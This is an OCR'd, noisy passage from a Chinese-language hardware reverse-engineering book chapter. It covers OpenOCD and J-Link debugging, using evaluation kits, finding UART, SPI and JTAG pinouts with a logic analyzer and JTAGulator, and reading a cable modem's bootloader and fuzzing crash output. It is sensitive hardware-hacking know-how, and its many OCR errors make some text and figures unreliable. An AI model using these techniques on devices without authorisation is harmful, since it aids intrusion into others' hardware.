For bug reports, read 


http://openocd.berlios.de/doc/doxygen/bugs.html 


RCLK - adaptive 

Warn : omap3530.dsp: huge IR length 38 
RCLK - adaptive 

trst_only separate trst_push pull 


Info : RCLK (adaptive clock speed) not supported - fallback to 1000 kHz 


Info : JTAG tap: omap3530.jrc tap/device found: 0x0b7ae02f 


part: Oxb7ae, ver: 0x0) 
Info : JTAG tap: omap3530.dap enabled 


(mfg: Ox017, 


Info : omap3530.cpu: hardware has 6 breakpoints, 2 watchpoints 
本 章 将 跳 过 一 些 配置 步骤 ,包括 创建 或 修改 主 配置 文件 openocd.cfg 以 及 界面 、 板 和 调试 目 
标 特定 的 配置 文件 等 。OpenOCD 的 很 多 问题 就 隐藏 在 这 些 细节 之 中 。 最 后 ， 当 OpenOCD 成 功 





























运行 时 ， 可 以 通过 telnet 连接 到 它 ， 然 后 得 到 一 个 命令 行 界面 : 


[s7ephen@xip ~]$ telnet localhost 4444 
Ty TG "27 O04 Las 

Connected to localhost. 

Escape character is '^]'. 

Open On-Chip Debugger 

> 


连 上 OpenOCD 以 后 ， 可 以 输入 help 命令 来 获得 帮助 信息 : 





> help 

bp list or set breakpoint [<address> <length> [hwl]l] 

cpu <name> - prints out target options and a comment 
on CPU which matches name 

debug_level adjust debug level <0-3> 

drscan execute DR scan <device> <num bits> <value> 
<num bitsl> <value2> ... 

dump_ image dump_image <file> <address> <size> 

exit exit telnet session 

fast fast <enable/disable> - place at beginning of 
config files. Sets defaults to fast angd dangerous. 

fast_load loads active fast load image to current target - 


mainly for profiling purposes 
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R72 


fast_load_ image 
find 

flush_ count 
ft2232_device_desc 


ft2232_latency 
Ft2232- layont 


ft2232_serial 
ft2232_viqd pid 


gdb_breakpoint_override 
gdb_detach 


gdb_flash program 
gdb_memory_map 
gdb_port 
gdb_report_data_abort 
halt 

help 

init 


interface 
interface_ list 
irscan 


same args as load_ image, image stored in memory - 
mainly for profiling purposes 

<file> - print full path to file according to 
OpenOCcD search rules 

returns number of times the JTAG queue has been 
flushed 

the USB device description of the FTDI FT2232 
device 

set the FT2232 latency timer to a new value 

the layout of the FT2232 GPIO signals used to 
control output-enables and reset signals 

the serial number of the FTDI FT2232 device 

the vendor ID and product ID of the FTDI FT2232 
device 

hard/soft/disable - force breakpoint type for gdb 
'break' commands. 

resume/reset/halt/nothing - specify behavior when 
GDB detaches from the target 

enable or disable flash program 

enable or disable memory map 

daemon configuration command gdb_port 

enable or disable reporting data aborts 

halt target 

Tcl implementation of help command 

initializes target and servers - nop on subsequent 
invocations 

try to configure interface 

list all built-in interfaces 
execute IR scan <device> <instr> 








[dev2] [instr2] 


这 个 界面 与 J-Link 的 命令 界面 非常 类 似 。 
在 试图 将 JTAG 适配器 与 一 款 商 业 设 备 相 连 时 ， 通 常 不 清楚 后 者 的 JTAG 引 脚 分 布 和 引 脚 标 
也 不 知道 其 JTAG 接口 是 否 已 经 打开 。 因 此 ， 在 一 个 未 知 的 或 商业 化 的 被 调试 目标 上 使 用 


























OpenOCD， 可 能 会 面 对 下 面 这 些 问 题 ， 从 而 遭遇 挫折 。 








口 引 脚 分 布 情况 是 怎样 的 ? 











它 能 正常 工作 吗 ? 


口 在 这 个 目标 设备 上 ，JTAG 是 启用 的 吗 ? 


( 换 句 话说 ，TDI、TDO、TCK 、TRST 和 TMS 引 脚 在 哪里 ? ) 


口 已 经 知道 了 目标 的 正确 引 脚 分 布 之 后 ， 怎 么 确定 连接 的 跳 线 和 连接 器 工作 正常 ? 

口 OpenOCD 正在 通过 正确 的 适配器 驱动 程序 与 适 配 需 交 互 吗 ? 

口 OpenOCD 正在 通过 正确 的 接口 传输 正确 地 解析 目标 设备 的 电线 线路 协议 吗 ? 

口 这 台 设 备 的 型 号 代码 与 OpenOCD 支持 的 某 个 设备 非常 类 似 但 又 不 完全 相同 , 这 种 情况 下 





由 于 以 上 原因 , 使 用 一 款 商 业 的 JTAG 软件 ( 比如 Segger 的 产品 ) 并 搭配 一 个 明确 支持 的 适 


配器 可 以 避免 时 间 损 耗 和 提心吊胆 。 由 于 商业 的 JTAG 方 案 包 含 了 所 有 用 于 支持 的 软件 ， 整 个 过 


程 会 变 得 非常 顺利 。 如 果 确 定 使 用 或 者 不 得 不 使 用 OpenOCD ， 最 好 事先 取得 一 套 需 调试 必 片 的 
评估 套件 。 
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评估 套件 

评估 套件 主要 用 于 工程 师 和 设计 师 为 其 系统 寻找 合适 的 产品 选 型 并 进行 评估 。 制 造 商会 对 几 
平 每 一 款 商 业 级 处 理 器 和 控制 器 提供 评估 套件 , 这 些 套件 通常 非常 便宜 ,从 免费 到 300 美元 不 等 
(许多 在 100 美 元 左右 ), 事实 上 , 制造 商 必须 确保 那些 可 能 使 用 它们 处 理 器 的 人 能 廉价 而 便捷 地 
获得 这 些 评估 套件 。 

许多 制造 商 甚至 会 提供 设计 参考 文件 ， 包 括 评估 套件 本 身 的 Gerber 文件 (3D 模型 和 接线 规 
范 ) 以 及 物料 清单 (Bill Of Materials，BOM )。 这 样 ， 艇 人 式 工程 师 就 可 以 更 快 地 制造 出 产品 原 
型 ， 而 不 需要 围绕 处 理 器 从 头 开始 构建 一 整 块 PCB 板 。 因 此 ， 这 个 评估 套件 对 逆向 工程 师 和 漏 
洞 研究 者 也 极为 有 用 。 图 13-12 就 是 STMicro 的 ARM 开发 套件 。 















































图 13-12 ”STMicro 的 ARM 开发 套件 


对 于 逆向 工程 师 来 说 , 评估 套件 的 主要 作用 在 于 对 调试 器 的 支持 。 评 估 板 包含 了 开发 者 用 于 
调试 、 编 程 以 及 与 处 理 带 打交道 所 需 的 一 切 , 还 可 能 包含 处 理 器 中 安全 特性 的 规格 说 明 , 制造 商 
也 许 会 将 这 些 安全 特性 用 于 保护 其 产品 。 

这 类 评估 套件 可 以 被 用 作 一 种 可 控 环境 ,来 测试 调试 配置 以 及 像 OpenOCD 这 样 的 软件 。 基 
于 这 种 可 控 环 境 ， 就 可 以 在 理想 条 件 下 排除 前 面 提 到 的 一 些 调 试 设置 问题 。 之 后 ， 在 面 对 真 实 
的 最 终 产品 时 ， 如 果 接 线 是 正确 的 、 设 备 的 JTAG 也 启用 了 ， 那么 调试 器 配置 就 应 该 可 以 正常 工 
作 了 。 

3. 最 终 连 接 

使 用 可 编程 接头 或 手工 接线 将 调试 器 硬件 与 要 调试 的 目标 芯片 连接 好 以 后 , 调试 器 软件 就 会 
提示 调试 器 已 经 成 功 与 目标 相连 。 如 果 用 的 是 Segger J-Link， 就 可 以 即刻 开始 用 GDB 调试 目标 
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了 ， 如 图 13-13 所 示 。 


ce C:\Program Files (x86)\SEGGER\JLinkARM_V444d\JLinkGDBServerCL.exe 
SEGGER J-Link GDB Server U4.44d 


JLinkARM.dAll U4.44d 《DLL compiled Mar 26 20912 18:47:16> 





The server has been started with the following settings: 
———Server related settings—— 
none 


2331 
SWYO thread re port: 2332 
Accept remote connection: localhost only 
of 


Host interface: 
Target endian: 
Target interface speed: 


Waiting for J-Link connection. 

J—Link is connected. 

Firmware: J-Link ARM U8 compiled Mar 19 20612 106:24:49 
日 


Connecting to target 


J-Link found 2 JIAG devices,. Ma IRLen = 9 
JIAG ID: Bx3BhBB47? 《Cortex-M3> 

Waiting for GDB connection. 

Connected to 127.0.8.1 

Reading all registers 

Read 4 bytes @ address OxA0000000 Data = Gx2000803FC> 





图 13-13 用 J-Link 调试 STM32 ARM 开发 套件 


13.1.4 寻找 调试 接口 


现在 , 我 们 已 经 了 解 了 各 类 常见 的 接口 及 其 工作 原理 , 但 是 真正 遇 到 这 些 接口 时 , 还 要 知道 
接 下 来 应 该 做 些 什 么 。 如 何 确定 每 个 引 脚 的 用 途 ? 如 何 将 这 些 引 脚 与 工具 相连 ? 事实 上 , 有 许多 
技巧 和 工具 可 以 用 来 判断 这 些 协 议和 格式 。 

本 节 将 列举 一 些 简单 的 工具 ， 用 来 识别 前 面 介绍 的 接口 (JITAG、FC、SPI 和 UART 等 ); 下 
一 节 则 进一步 讨论 如 何 用 这 些 工具 与 之 建立 连接 。 

1. 使 用 逻辑 分 析 仪 

要 判断 一 根 引 脚 的 用 途 ， 最 有 用 的 工具 也 许 是 一 台 逻 辑 分 析 仪 。 对 搞 软 件 的 人 来 说 ， 这 个 
名 字 相 当 吓 人 ， 但 它 其 实 非常 简单 : 显示 这 根 引 脚 上 正在 发 生 什么 。 用 一 根 探 针 将 引 脚 连 到 侵 
辑 分 析 仪 以 后 ， 如 果 数 据 从 该 引 脚 经 过 ， 它 就 会 显示 一 系列 数据 波 ， 还 可 能 尝试 用 不 同 的 滤波 
器 来 解码 。 

传统 的 逻辑 分 析 仪 有 一 点 复杂 , 但 是 新 一 代 产 品 通 过 与 计算 机 中 的 软件 相连 ,去 掉 了 设备 中 
原本 难以 理解 的 特性 。 这 种 逻辑 分 析 仪 在 硬件 上 没有 用 户 界面 , 用 户 完全 通过 计算 机 中 友好 直观 
的 软件 客户 端 来 控制 。 图 13-14 所 示 的 Saleae 逻辑 分 析 仪 就 是 这 样 一 种 设备 。 
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图 13-14 ”Saleae 逻辑 分 析 仪 


使 用 Saleae 时 ,首先 将 目标 设备 上 的 引 脚 与 不 同 颜色 标记 的 电极 相连 ,然后 通过 软件 客户 端 

来 捕获 引 脚 上 的 活动 情况 。 软 件 客户 端 通过 USB 接口 从 Saleae 接收 数据 ， 得 到 的 结果 将 以 连接 
引 脚 的 电极 颜色 显示 在 软件 界面 上 ， 如 图 13-15 所 示 。 

0 

: 站 mm 

gr EEEEB 

: ainin 

4 站 mm 














一 一 
dr EE 
ED 一 一 一 一 
re EE 





图 13-15 ”运行 中 的 Saleae 逻辑 分 析 仪 


如 果 外 行 觉得 这 还 不 够 ，Saleae 还 在 软件 中 提供 了 另外 一 些 实用 的 功能 。 比 如 ， 它 会 尝试 用 
一 些 滤波 器 以 不 同 的 波 特 率 将 捕获 到 的 数据 流 当 作 各 类 协议 〈 包 括 了 TC、SPI 和 UART 等 ) 进行 
解码 ， 甚 至 还 会 尝试 自动 判断 波 特 率 。 图 13-16 展示 了 Saleae 软件 通常 支持 的 滤波 器 。 
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图 13-16 ”Saleae 逻辑 分 析 仪 中 的 滤波 骨 


这 些 滤波 絮 非 常 像 Wireshark 中 的 协议 解析 器 ， 它 们 会 将 捕获 到 的 数据 按照 各 类 格式 进行 解 
析 ， 然 后 展示 出 来 。 在 Saleae 的 界面 上 ， 其 至 还 可 以 看 到 数据 的 方 波 图 ， 如 图 13-17 所 示 。 








2412.0ms 


v 


re EEEE 


:TE 回回 


;EEE 回回 

D9 ec Dey 
‘EET nn 了 
二 


图 13-17 ”Saleae 逻辑 分 析 仪 的 字 节 展示 界 玫 


有 了 这 些 功能 ， 就 基本 上 能 通过 滤波 器 或 肉眼 马上 识别 出 UART 信号 了 ， 因 为 绝 大 部 分 
UART 连接 传输 的 都 是 ASCII 文 本 。 

最 后 ，Saleae 支持 将 解码 后 的 数据 导出 为 二 进 制 文件 , 用 于 解析 ; 还 能 导出 为 CSV 格式 文 
件 ， 并 附带 一 些 元 数据 (例如 时 间 、 引 脚 编 号 等 )。 这 个 功能 对 后 续 进 一 步 分 析 和 日 志 记录 非 
第 有 帮助 。 

2. 寻找 UART 引 脚 分 布 

UART 经 常用 于 输出 调试 信息 、 为 开发 者 提供 Shell 或 其 他 交互 终端 ， 因 此 找 出 UART 引 肢 
分 布 非 常 重要 。 许 多 在 市 场 上 销售 的 最 终 产 品 不 仅 包含 并 启用 了 这 类 接口 ,而 且 将 其 引 脚 很 明显 
地 暴露 了 出 来 。 在 2010 年 和 2011 年 ，Stephen A. Ridley 和 Rajendra Umadras 在 一 系列 的 报告 中 
揭示 了 这 一 情况 。 他 们 研究 了 纽约 市 大 都 会 区 家 庭 互 联网 服务 商 提供 的 某 一 型 号 电缆 调制 解 调 

































































器 。 这 个 系列 的 家 用 电缆 调制 解 调 器 使 用 了 博通 BCM3349 系列 的 一 款 芯 片 (BCM3349KPB )， Ee 


其 PCB 板 上 的 4 根 UART 引 脚 都 是 暴露 的 ， 如 图 13-18 所 示 。 
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13-18 博通 BCM3349 的 四 针 接 头 


在 这 个 案例 中 ,我 们 还 不 知道 接头 的 每 根 引 脚 分 别 是 什么 、 有 什么 用 途 。 保 险 起 见 ， 先 将 一 
个 电压 计 与 各 个 引 肢 相连， 如 图 13-19 所 示 。 

















图 13-19 对 博通 BCM3349 的 电压 测试 











这 一 步 是 为 了 确保 引 脚 上 不 带 高 电压 ， 以 防 烧 坏 分 析 仪器 。 另 外 ,完全 不 带电 压 的 引 脚 一 般 
是 接地 引 脚 。 

13-19 中 的 电压 是 3.3 伏 。 通 常情 况 下 ， 对 专门 给 设备 供电 而 不 传输 数据 的 线路 ， 引 脚 的 
电压 是 5 伏 左右 ， 因 此 这 根 引 脚 很 可 能 (但 不 确定 ) 是 用 于 数据 传输 的 。 这 是 判断 引 脚 上 是 否 有 
串 行 数据 的 第 一 条 线索 。 

接 下 来 , 将 Saleae 的 电极 连接 到 每 一 根 存疑 的 引 脚 上 。Saleae 用 户 界面 上 每 个 图 形 区 域 的 颜 
色 与 不 同 电极 的 颜色 一 一 对 应 ， 可 以 很 容易 地 区 分 出 来 。 接 通电 缆 调 制 解 调 需 的 电源 后 ，Saleae 
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就 会 开始 记录 数据 。 和 常见 的 一 个 假设 是 , 在 刚刚 通电 开机 局 动 时 ,电缆 调制 解 调 圳 会 开始 输出 数 
据 。 多 记录 几 次 启动 过 程 后 ， 就 可 以 看 到 如 图 13-20 所 示 的 针脚 方 波 图 。 








Q Saleae Logic 1.0.33 - [Connected] 


lMSamples v25Mtz  - 国 str | 
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Duty Cycle: ### 


res ELEEE ee 
T1: 入 


EEEE ee 
[TION 四 目 目 日 四 四 











图 13-20 博通 BCM3349 的 Saleae 引 脚 测试 


在 这 个 图 中 ,红色 的 Input 3 的 方 波 非常 有 规律 ， 这 说 明 红色 电极 所 连接 的 引 脚 很 可 能 是 一 
个 时 钟 引 脚 。 时 钟 引 脚 信号 通常 伴随 着 数据 信号 ， 它 们 就 像 演奏 数据 这 种 音乐 时 的 节拍 器 一 样 。 
对 接收 方 来 说 ， 将 收 到 数据 进行 时 间 同 步 非 常 重要 。 这 里 规律 的 方 波 和 旁边 Input 4 不 规律 的 方 
波 说 明 我 们 同时 观测 到 了 一 个 时 钟 引 脚 和 一 个 数据 引 脚 。 

继续 使 用 Saleae 的 功能 , 用 其 自 带 的 滤波 器 或 分 析 需 对 这 些 捕 获 到 的 方 波 进行 分 析 , 从 而 验 
证 前 面 的 猜测 。 

如 图 13-21 所 示 ， 分 析 器 跑 完 以 后 ， 会 在 每 一 节 方 波 上 覆盖 一 个 猜测 的 字 节 值 ， 并 显示 猜测 
的 波 特 率 。 


































































































QQ saleaetogic1033 - [Connected] Ecal- 
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图 13-21 博通 BCM3349 用 Saleae 分 析出 的 字 节 
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将 这 些 数 据 输 出 为 计算 机 中 的 CSV 文件 ， 然 后 用 下 面 这 段 简单 的 Python 脚本 来 清洗 数据 : 


#!/usr/bin/env python 
import csv 


reader = csv.reader (open ("BCM3349_capture.csv", "rb")) 
thang = "" 
for row in reader: 
thang = thang+row[1] 
thang = thang.replace("\\r", "\x0d") 
thang = thang.replace("\\n", "\x0a") #clean up Windows CR/LF 
( 


thang = thang.replace("''","") #Cleanse Saleae CSV output quotes 


#print thang 
import pdb;pdb.set_trace() # drop into an "in scope" Python interpreter 


通过 这 段 Python 脚本 ， 可 以 查看 导出 的 CSV 数据 ， 并 且 在 熟悉 的 Python Shell 中 交互 地 操 
作 这 些 数据 。 打 印 thang 变量 可 以 产生 如 图 13-22 所 示 的 输出 。 





SARidleys-MacBook-Air:Desktop sa7$ ./thing.py 
--Return—— 

> /Users/sa7/Desktop/thing.py(11)<module>()->None 
-> import pdb; pdb.set_trace() 

(Pdb) print thang 

Value'246'0 

MemSize:' oo ” '8M 

FLash' 'detected' '@0xbe000000 


Signature:' 'a806 


Broadcom' 'BootLoader' 'Version:' '2.1.6d' 'release' 'Gnu 
Build' 'Date:' 'Apr' '29' '2004 
Build' ‘Time:' '17:54:32 


Image' '1' "Program' 'Header: 

: 'Signature:' 'a806 

'Control:' “0005 

y 'Major' 'Rev:' '0400 

Y 'Minor' 'Rev:' '04ff 

' "Build’' 'Time:' '2004/5/8' '04:33:27' 'Z 
' 'File' 'Length:' '756291' 'bytes 

Load' 'Address:' '80010000 


'Filename:' 'ecram_sto.bin 
' 'HCS:' '440a 
'CRC:' “90cc24e0 


Image' '2' 'Program' 'Header: 
a 'Signature:' 'a806 
a, ‘Control:' '0005 











图 13-22 ”博通 BCM3349 的 bootloader 输出 信息 


可 以 看 到 , 从 这 些 引 脚 上 捕获 到 的 数据 实际 上 是 设备 启动 时 的 引导 信息 。 该 设备 引导 了 一 个 
名 为 eCos 的 实时 操作 系统 。 两 位 研究 人 员 指 出 这 款 电线 调制 解 调 喜 上 还 运行 着 一 个 戏 入 式 Web 
服务 器 ， 并 对 该 服务 器 进行 了 模糊 测试 。 在 模糊 测试 导致 月 省 时 ,产生 的 栈 回 溯 信 息 通过 UART 
串口 打印 出 来 ， 如 图 13-23 所 示 。 这 些 信息 有 助 于 开发 对 该 设备 的 漏洞 利用 。 
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ro/zero=00000000' 'rl/at' “=00000000'“'r2/v8' “=ffffffff' 'r3/v1' “=801f965c 


r4/a0' “=00000010' 'r5/al' “=00000000' 'r6/a2' “=801f9a9c'" 'r7/a3' “=801f9c88 
r8/t0' “=80549184' 'r9/t1' “=00000002' 'r10/t2' '=36313733' 'r1l1/t3' “=37303030 
r12/t4' '=00281f40' “r13/t5' '=ffffffff' 'r14/t6' '=ffffffff' 'r1l5/t7' '=801f965c 


1 
r16/s0' '=807ee210' 'r17/s1' “=00000000' 'r18/s2' “=80300000' 'r19/s3' “=80300000 
' 
' 


r20/s4' '=80549184' 'r21/s5' “=80555b00' 'r22/s6' “=11110016' 'r23/s7' “=11110017 
r24/t8' '=0028e550' 'r25/t9' '=ffffffff' 'r26/k0@' '=805548a8' 'r27/k1' '=00000000 
r28/gp' “=80554808' 'r29/sp' “=80554880' 'r306/fp' '=80555f80' 'r31/ra' “=80022674 
PC' ':' 0x80022674 "error' 'addr:' '0x80022650 

cause:' '0x807ee210 ' “status: “0x1000fc60 


BCM' ‘interrupt' 'enable:' 'fffffff7' 'status:' '00000000 


entry' '800225f0' 'called' 'from' '801fd150 
entry' '801fd054" 'called' 'from' '801lfaca4 
entry' '801lfac9gc’ 'called' 'from' “80138098 
entry' '80138064 'called' 'from' '80135964 
entry' '801358f8 'called' 'from' '80137cb8 
entry' '80137c54"' 'called' 'from' '801fbea8 
entry' “801fbe98 'called' ‘from' '801fbb7c 
entry' '801fbb58" 'called' 'from' '801fbed8 
entry' '801fbec8"' 'called' 'from' '80205ae4 
entry' “80205ad4 'called' “from' '8001037c 
entry' '80010358' 'Return' 'address' '(060000000)' 'invalid' 'or' 'not' 'found.' ‘Trace' 'stops. 


Task:' 'tHttpd 








ID:" “0x0026 
HandtLe: “0x807ee210 
Set' 'Priority:"' '29 








图 13-23 ”博通 BCM3349 的 骨 溃 日 志 


3. 寻找 SPI 和 PC 引 脚 分 布 

寻找 SPI 和 TcC 设备 的 过 程 与 寻找 UART 非常 类 似 。 但 是 PCB 板 上 的 SPI 和 TcC 一 般 都 是 本 
地 使 用 ， 在 芯片 之 间 传 输 数 据 ， 这 使 识别 方法 稍 有 不 同 。 它 们 有 时 也 会 离开 PCB 板 ， 用 于 外 设 
(通常 是 专 有 外 设 ) 通信 。 一 个 典型 例子 是 任天堂 的 Wii 控制 器 ， 这 种 游戏 主 控 台 通常 在 有 线 连 
接 至 游戏 主机 终端 时 使 用 SPI。 这 种 插头 的 引 脚 分 布 如 图 13-24 所 示 。 






































GND 





3.3V 数据 





图 13-24 Wii 插 头 的 引 肢 分布 
在 这 些 SPI 引 脚 上 传输 的 数据 有 很 大 差异 ， 主 要 取决 于 设备 或 者 控制 器 的 制造 商 选 择 如 何 














将 其 格式 化 。 因此, 经 过 TC 或 SPI 的 数据 完全 取决 于 分 析 的 目标 设备 。 后 面 将 介绍 如 何 嗅 探 这 
些 总 线 。 

4. 寻找 JTAG 引 脚 分 布 

寻找 JTAG 引 脚 是 一 项 艰巨 的 任务 。 正 如 前 文 所 述 ,JTAG 串 行 线 缆 调 试 ( Serial Wire Debugging， 
SWD ) 的 引 脚 分 布 完 全 取决 于 被 调试 设备 的 制造 商 。 看 一 下 开发 板 和 评估 套件 中 的 标准 JTAG 接 
头 ， 就 会 明白 有 多 种 引 脚 配置 。 图 13-25 给 出 了 最 常见 的 接头 。 
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ARM 10 针 接头 ST 14 针 接头 OCDS 16 针 接头 ARM 20 针 接头 
NEN 1|o ol|2 /RST TMS 1|joobo|2 vcctopional VCC 1| o o |2 Vcc {optional) 

VCC 1| oo |2 TMS GND3|o00|4 NC TDO3|o0o|4 GND TRST 3| oo |4 GND 

GND3 oo0 |4 Tk Tol5lool6TSTAT CpucIK 5| oo|6 GND Dl 5| oo |6 GND 

GND5 oo |6 TDO VC 7l o o |8 /RST TD 让 po |8 RESET IMS 7| oo |8 GND 

RTCK 7 on |8 TD IMS 9| oo |10GND TRST 9| oo |10BRKOUT TCK 9 © © | 10 GND 

GND 9| po |10RESET TCLK11| o o |12 GND TCLK11| o o |12GND RTCK11Y| o o | 12 GND 

TDO13| o o |14/TERR BRKIN13| oo | 14 OCDSE TDO13| o 0 | 14 GND 

TRAP15| o o | 16 GND RESET15| o o | 16 GND 

N/C17| o o |18GND 

N/C19| o o | 20 GND 

图 13-25 ”常见 JTAG 接头 引 脚 分 布 


如 果 连 这 样 的 受 控 环境 都 存在 多 种 可 能 ,那么 面 对 真 实 世界 中 各 种 各 样 的 设 
前 面 介绍 过 ,在 JTIAG SWD 上 执行 简 
脚 就 够 了 。 重 复 一 下 ， 这 些 引 脚 是 : 

口 TDO: 测试 数据 输出 
口 TDI: 测试 数据 输入 
口 TMS: 测试 模式 选择 
口 TCK: 测试 时 钟 








口 TRST: 


谢 天 谢 地 的 是 ， 


三 








测试 重 置 





实际 上 ， 连 TRST 都 是 可 选 的 ， 只 用 来 
面 对 新 设备 , 要 从 一 大 片 没 有 任何 标记 的 引 脚 中 找 出 需要 的 那些 ,几乎 就 是 一 个 纯 靠 猜测 的 














游戏 。 寻 找 时 名 


明 这 是 TCK 引 脚 ， 但 如 明 








原因 是 要 尝试 的 可 能 组 合 太 多 了 。 

















注 运 的 是 ,不 久 前 ， 黑 客 、 首 向 工程 师 融 


E 置 目标 设备 。 





RR 纯 手动 地 去 做 ， 整 个 过 程 会 非常 消耗 时 间 ， 可 








单 的 调试 功能 只 需 


备 ,应 该 
要 其 


怎么 办 ? 
中 少数 几 根 引 


上 引 脚 时 还 有 一 些 局 发 式 的 逆向 工程 方法 可 以 用 一 一 前 面 介绍 过 , 规律 性 的 方 波 说 








人 bE 
有 7 





要 几 天 其 至 几 周 ， 


EK 开发 者 Joe Grand 创造 了 一 种 名 为 JIAGulator 的 开 


源 硬件 设备 。 通 过 它 ， 首 向 工程 师 可 以 轻松 遍历 所 有 可 能 的 引 脚 组 合 ， 从 而 暴力 破解 出 JIAG 引 
脚 分 布 。 如 果 想 自己 做 出 这 块 设 备 ， 电路图、 物料 清单 (BOM ) 和 固件 都 在 Joe Grand 的 网 站 上 








以 供 














全 装 好 的 JTAGulator: www.parallax.com/product/32115， 如 
有 了 JTAGulator, 首先 将 所 有 存疑 的 引 脚 接 到 JTAGulator 的 末端 或 者 接头 上 , 并 将 目标 设备 


上 至 少 一 根 地 线 引 脚 接 到 JTAGulator 的 GND 上 。JTAGulator 是 由 USB 供 





图 13-26 所 示 。 

















程序 ( 比如 PuTTY、GNU Screen 或 者 Minicom ) 能 直接 连接 。 


[s7ephen@xip ~]S$ ls /dev/*serial* 
/dev/cu.usbserial-A901KKFM 


Designed by Joe Grand 


/dev/tty.usbserial-A901KKFM 
[s7ephen@xip ~]$ screen /dev/tty.usbserial-A901KKFM 115200 


连接 到 设备 后 ， 可 以 看 到 一 个 非常 友好 的 交互 式 命令 行 界面 ,显示 了 设备 作者 和 固件 版 本 : 


JTAGulator 1.1 


[joe@grandideastudio.coml] 








下 载 : www.grandideastudio.com/portfolio/jtagulator。 也 可 以 在 Parallax 网 站 直接 购买 一 个 完 





的 , 用 各 类 标准 终端 
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混 


JTAG Commands: 

I Identify JTAG pinout (IDCODE Scan) 
B Identify JTAG pinout (BYPASS Scan) 
D Get Device ID(s) 

四 Test BYPASS (TDI to TDO) 





UART Commands: 
U Identify UART pinout 
了 UART pass through 


General Commands: 

V Set target system Voltage (1.2V to 3.3V) 
R Read all channels (input) 

WwW Write all channels (output) 

H Print available commands 


输入 保护 电路 
目标 接口 (24 路 ) 电 平 转换 器 状态 指示 灯 


) 


ge 


PF 光 寺 


2215 
my 1 0 us 





螺旋 桨 芯片 运算 放大 器 / USB 
数 模 转换 器 


图 13-26 JTAGulator 


按 瑟 键 可 以 显示 交互 式 帮 助 。 


注意 自 国 件 版 本 1.1 起 ,JTAGulator 就 不 直接 响应 按键 了 。 如 果 使 用 的 是 这 些 版 本 ， 需 要 在 终 
端 程序 中 打开 Local Echo 功能 。 


Joe Grand 在 他 的 网 站 上 发 布 了 使 用 JTAGulator 暴力 破解 黑莓 7290 手机 JTAG 引 脚 分 布 的 视 
频 和 文档 。 当 然 ， 任 何 设备 的 JTAG 引 脚 都 可 以 用 JTAGulator 确定 。 我 们 选择 基于 Android 的 
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HTC Dream 手机 和 Luminary Micro 的 LM3S8962 评估 板 进行 演示 。HTC Dream 手机 的 JTIAG 引 
脚 非常 难以 接 上 ， 因 此 我 们 从 一 家 名 为 Multi-COM 的 波兰 公司 购买 了 一 个 特殊 的 适配器 。 该 公 
司 专门 生产 各 类 用 于 手机 的 调试 电缆 、 适 配器 和 其 他 底层 设备 。 将 目标 设备 上 所 有 不 确定 的 引 脚 
都 接 上 JTAGulator 之 后 , 选择 与 目标 设备 一 致 的 电压 用 于 JTAG 引 脚 的 操作 。 可 以 猜测 这 个 电压 
值 ， 也 可 以 从 目标 处 理 器 的 规格 说 明 中 查 到 。 绝 大 部 分 芯片 的 标准 电压 值 是 3.3 伏 。 可 以 用 v 命 
令 来 设置 这 个 参数 : 

Current target voltage: Undefined 


Enter new target voltage (1.2 - 3.3, 0 for off): 3.3 
New target voltage set! 





























完成 这 一 步 之 后 , 最 快 的 方法 是 先 做 一 次 IDCODE 扫描 , 执行 BYPASS ( 边界 检查 ) 扫描 稍 
慢 一 些 。IDCODE 扫描 是 JITAG SWD 标准 的 一 部 分 ,用 于 JTAG 从 设备 (这 里 是 目标 设备 /处 理 
器 ) 向 JTAG 主 设备 (这 里 是 JTAGulator ) 表明 身份 。 

JTAGulator 会 快速 遍历 所 有 可 能 的 引 脚 组 合并 执行 这 个 基本 通信 。 如 果 它 收 到 一 个 响应 ， 就 
会 记录 该 响应 是 哪个 引 脚 配置 产生 的 ， 由 此 可 以 确定 哪些 引 脚 是 用 于 JTAG 的 。 

在 HTC Dream 上 ,通过 I 命令 来 执行 IDCODE 扫描 ,此 时 需要 告诉 JTIAGulator 哪些 引 脚 是 
我 们 所 怀疑 的 JTAG 引 脚 : 















































Enter number of channels to use (3 - 24): 19 
Ensure connections are on CH19..CHO. 

Possible permutations: 6840 

Press spacebar to begin (any other key to abort)... 
JTAGulating! Press any key to abort... 


PDE: "NAA: 
TDO: 4 
TERs 
TMS; -5 


IDCODE scan complete! 


命令 开始 执行 后 ，JTAGulator 会 显示 它 尝 试 暴力 破解 的 所 有 可 能 引 脚 分布 组 合 的 数目 。 它 几 
乎 在 一 瞬间 就 得 到 了 响应 ， 并 识别 出 是 哪个 引 脚 配置 产生 了 IDCODE 扫描 响应 。 现 在 ， 可 以 用 
J-Link 或 者 其 他 JTAG 调试 器 连接 这 些 有 响应 的 引 脚 ， 然 后 开始 调试 目标 设备 ! 

5. 连接 到 定制 的 UART 接口 

许多 手机 (包括 Android 设备 ) 都 以 某 种 形式 暴露 了 UART 接 口 ， 可 以 通过 非 标准 的 线 缆 来 
访问 。 这 种 线 缆 一 般 被 称 为 夹具 (jig )。 这 个 名 字 来 源 于 金属 和 木头 加 工 ， 指 一 个 自 定 制 的 工具 ， 
用 于 辅助 完成 工作 。 在 XDA-Developers 论坛 可 以 找到 包括 Galaxy Nexus 在 内 的 许多 三 星 设备 的 
夹具 信息 :http://forum.xda-developers.com/showthread.php?{=1402286。, 在 http://blog.accuvantlabs.com/ 
blog/jdryan/building-nexus-4-uart-debug-cable ,还 可 以 找到 为 Nexus4 手 机 制作 基于 耳机 搬 孔 UART 
线 的 教程 。 可 以 通过 这 些 定 制 的 线 来 访问 UART 接口 , 用 于 实现 第 10 章 介绍 的 交互 式 内 核 调 试 。 
























































13.2 识别 组 件 353 





13.2 ”识别 组 件 


前 面 提 到 , 可 以 从 目标 处 理 器 与 目标 设备 的 规格 说 明 书 中 获得 信息 , 但 是 没有 讲 如 何 获 得 这 
些 规格 书 。 事 实 上 ,几乎 所 有 集成 电路 芯片 的 表面 都 印 有 字母 和 数字 组 成 的 字符 串 。 如 果 对 此 感 
兴趣 ， 可 以 在 网 上 找到 许多 关于 这 些 字 符 串 编码 格式 的 说 明 ， 其 中 夹杂 着 各 种 今 人 头痛 的 细节 。 
作为 逆向 工程 师 或 者 漏洞 研究 人 员 ， 最 重要 的 是 通过 搜索 引擎 确定 这 块 芯片 的 作用 。 

在 网 上 搜索 组 件 时 ， 通 常会 找到 其 制造 商 的 官网 或 者 大 型 经 销 商 (比如 DigiKey 和 Mouser 
Electronics ) 的 数据 手册 。 经 销 商 的 网 站 相当 有 用 ， 通 常会 对 组 件 及 其 用 途 进行 总 结 ， 还 会 提供 
